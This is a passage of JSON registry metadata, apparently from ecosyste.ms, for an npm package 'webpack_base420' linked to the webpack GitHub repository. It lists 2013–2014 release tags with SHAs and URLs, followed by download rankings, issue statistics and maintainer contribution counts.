rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-28T18:38:40.168Z","dependent_packages_count":0,"downloads":17,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":31.617524749818905,"dependent_repos_count":25.32799796580169,"dependent_packages_count":32.89382871786066,"stargazers_count":0.0921206343210804,"forks_count":0.5381675911031425,"average":18.093927931781096},"purl":"pkg:npm/webpack_base420","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack_base420","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack_base420","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack_base420/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T00:11:08.805Z","issues_count":10164,"pull_requests_count":9440,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2773483.7856259136,"issues_closed_count":9898,"pull_requests_closed_count":8891,"pull_request_authors_count":1445,"issue_authors_count":6685,"avg_comments_per_issue":5.83530106257379,"avg_comments_per_pull_request":3.1801906779661016,"merged_pull_requests_count":6026,"bot_issues_count":8,"bot_pull_requests_count":2913,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":363637.6099865047,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":741,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4375,"past_year_avg_comments_per_pull_request":4.864893617021276,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":586,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1081,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api